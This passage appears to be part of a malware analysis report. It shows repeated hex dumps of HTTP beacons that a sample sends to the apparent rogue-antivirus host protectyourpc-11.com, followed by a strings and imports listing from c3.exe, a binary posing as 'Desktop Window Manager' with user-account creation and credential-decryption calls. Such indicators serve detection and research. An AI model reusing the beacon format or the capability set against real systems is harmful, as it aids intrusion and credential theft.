0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 345f3433   status=err094_43
0x00000070 (00112)   5f313130 3031266e 3d302665 78747261   _11001&n=0&extra
0x00000080 (00128)   3d302048 5454502f 312e310d 0a486f73   =0 HTTP/1.1..Hos
0x00000090 (00144)   743a2070 726f7465 6374796f 75727063   t: protectyourpc
0x000000a0 (00160)   2d31312e 636f6d0d 0a557365 722d4167   -11.com..User-Ag
0x000000b0 (00176)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000c0 (00192)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000d0 (00208)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000e0 (00224)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x000000f0 (00240)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000100 (00256)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000110 (00272)   0a766572 20636f75 6c64206e 6f742075   .ver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7633 30267379 7374656d   ype=g_v30&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d41 35393034   00|1033&id=A5904
0x00000050 (00080)   37343034 33443734 46464337 35444526   74043D74FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 335f3433   status=err093_43
0x00000070 (00112)   5f313130 3031266e 3d302665 78747261   _11001&n=0&extra
0x00000080 (00128)   3d302048 5454502f 312e310d 0a486f73   =0 HTTP/1.1..Hos
0x00000090 (00144)   743a2070 726f7465 6374796f 75727063   t: protectyourpc
0x000000a0 (00160)   2d31312e 636f6d0d 0a557365 722d4167   -11.com..User-Ag
0x000000b0 (00176)   656e743a 204d6f7a 696c6c61 2f342e30   ent: Mozilla/4.0
0x000000c0 (00192)   2028636f 6d706174 69626c65 3b204d53    (compatible; MS
0x000000d0 (00208)   49452036 2e303b20 57696e64 6f777320   IE 6.0; Windows 
0x000000e0 (00224)   4e542035 2e31290d 0a436f6e 74656e74   NT 5.1)..Content
0x000000f0 (00240)   2d4c656e 6774683a 20300d0a 436f6e6e   -Length: 0..Conn
0x00000100 (00256)   65637469 6f6e3a20 636c6f73 650d0a0d   ection: close...
0x00000110 (00272)   0a766572 20636f75 6c64206e 6f742075   .ver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.


Strings
K...
r.d<
.
....N.
.
.5..
..5...
^|
.]
.`.q
.[_.....WE...5
G
F
.

040904b0
1, 0, 0, 1
1102
BBef
c3.exe
Copyright (C) 2010
`%d`
Desktop Window Manager
FileDescription
FileVersion
GG@%
InternalName
LegalCopyright
&Main
MS Sans Serif
OriginalFilename
PrivateBuild
ProductVersion
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
01ZF+G
(0vtVu
1SI:)l
23Qhav~
<2A"mM
3ul3L/iRQ!
4J&!@l
5;AD8^8)
{"-5h&
5"P	ifW
/5PP/1m
65|jZ("
6`Bbok
*7{~cV
7sqi/h?
+?{9.j
9l>8"j
9N+;\xx@
A0)#6ZZ1|
AbvT~RS
,Al7jw
&a@tM7
BD-|\G)\
BitBlt
\	cG#M}
CloseHandle
CLSIDFromProgID
CLSIDFromString
CoAllowSetForegroundWindow
CoCreateGuid
CoCreateInstance
CoGetClassObject
CoInitializeEx
CoInitializeSecurity
CommandLineToArgvW
CoSetProxyBlanket
CoTaskMemAlloc
CoTaskMemFree
CoUninitialize
CreateCompatibleBitmap
CreateCompatibleDC
CreateEventW
CreateFileW
CreateMutexW
CreateSolidBrush
CreateStreamOnHGlobal
CreateThread
CRYPT32.dll
CryptProtectData
CryptUnprotectData
@.data
DDRAW.dll
DeleteCriticalSection
DeleteDC
DeleteObject
Dh$k=N
dh%MP)
DirectDrawCreate
DirectDrawCreateEx
DirectDrawEnumerateA
dJ.k%`
DWM*J$
(DYetu
D'z?_e
EnterCriticalSection
e^&{\Tq@c
?eWw p
ExitProcess
FindExecutableW
FindResourceExW
FindResourceW
FlushInstructionCache
FormatMessageW
FreeLibrary
FRJmM'
GDI32.dll
GdipAlloc
GdipCloneImage
GdipCreateBitmapFromFile
GdipCreateBitmapFromFileICM
GdipCreateHBITMAPFromBitmap
GdipDisposeImage
GdipFree
gdiplus.dll
GdiplusShutdown
GdiplusStartup
GetACP
GetComputerNameW
GetCurrentProcess
GetCurrentThreadId
GetDeviceCaps
GetFileVersionInfoSizeW
GetFileVersionInfoW
GetLastError
GetLocaleInfoA
GetLocaleInfoW
GetModuleFileNameW
GetModuleHandleW
GetObjectW
>GetPh'M@
GetProcAddress
GetProcessHeap
GetProcessId
GetProcessVersion
GetStartupInfoW
GetStockObject
GetSystemDirectoryW
GetSystemInfo
GetSystemTimeAsFileTime
GetTempPathW
GetThreadLocale
GetTickCount
GetUserNameExW
GetVersionExA
GetVersionExW
GlobalAlloc
GlobalFree
GlobalHandle
GlobalLock
GlobalUnlock
glpEhA
~gM'[a
gz?voG
HeapAlloc
HeapDestroy
HeapFree
HeapReAlloc
HeapSetInformation
HeapSize
hhLoca
%hK].XR
hroteh
H.tm+Ql
-_	i71
iD5LTsR
i>gpzS
i&kVM6
i{L+7n
InitializeCriticalSection
InterlockedCompareExchange
InterlockedDecrement
InterlockedExchange
InterlockedIncrement
i--Re!
IsDebuggerPresent
IsProcessorFeaturePresent
it+=29
|=I	t;Z+
\/&j&i
j)Yx\g
K5p<LA
KERNEL32.dll
kEwW90
l4%&Dt
LCMapStringW
L/D$c!
LeaveCriticalSection
LoadLibraryA
LoadLibraryExW
LoadLibraryW
LoadResource
LocalAlloc
LocalFree
LockResource
lstrcmpW
lstrlenA
lstrlenW
:(m[0z
-M3wwSJ
	(MK1+$
Ml+-38
[M{o_k"
mr?(U2g
MulDiv
MultiByteToWideChar
NETAPI32.dll
NetApiBufferFree
NetGetJoinInformation
NetLocalGroupAddMembers
NetUserAdd
NetUserDel
NetUserEnum
NetUserGetLocalGroups
NetWkstaUserGetInfo
.NtIM{
oC3>P4
OI(!j#4
ole32.dll
OleInitialize
OleLockRunning
OleUninitialize
?)oooB
OpenProcess
o{]VzX
PathAppendW
PathCombineW
PDPP]C
[P-lPF|
<P[o	ws:
$[PP[7
ProcessIdToSessionId
}@Pv16
[(,qHX
?%qj:;
q%'kMa
QKN;jm
QueryPerformanceCounter
r8|*4n
RaiseException
`.rdata
ReleaseMutex
ResetEvent
Ri	"W7
Rj2P(@
rQ2r$?
Secur32.dll
'SeG	Q
SelectObject
SetEvent
SetLastError
SetUnhandledExceptionFilter
SHAppBarMessage
SHELL32.dll
ShellExecuteExW
ShellExecuteW
Shell_NotifyIconW
SHGetFolderPathW
SHLWAPI.dll
SizeofResource
sKr	r=_
S(LnR@
:s?ml:Sn
s>NB;_
s+,Ow<_
StringFromCLSID
StringFromGUID2
SUimnf
t1rhqH
t@4|!_1
T9U(hG
TerminateProcess
!This program cannot be run in DOS mode.
ThlFreh
ThLoadh
@%tM|.
TShuP@
Uc4RU,
UnhandledExceptionFilter
UrlApplySchemeW
UrlCanonicalizeW
UrlCombineW
UrlGetPartW
VerQueryValueW
VERSION.dll
VirtualAlloc
VirtualFree
VirtualLock
VirtualUnlock
}*vKP~
v|MI[f
v-Q=p:B
WaitForMultipleObjects
WaitForSingleObject
]WhJaP
WideCharToMultiByte
WTSAPI32.dll
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSRegisterSessionNotification
WTSUnRegisterSessionNotification
wwqXJs6
wzK;wup'w\
xK%Q}@
+Y|ojs
:y	,\r
&zSc-Ad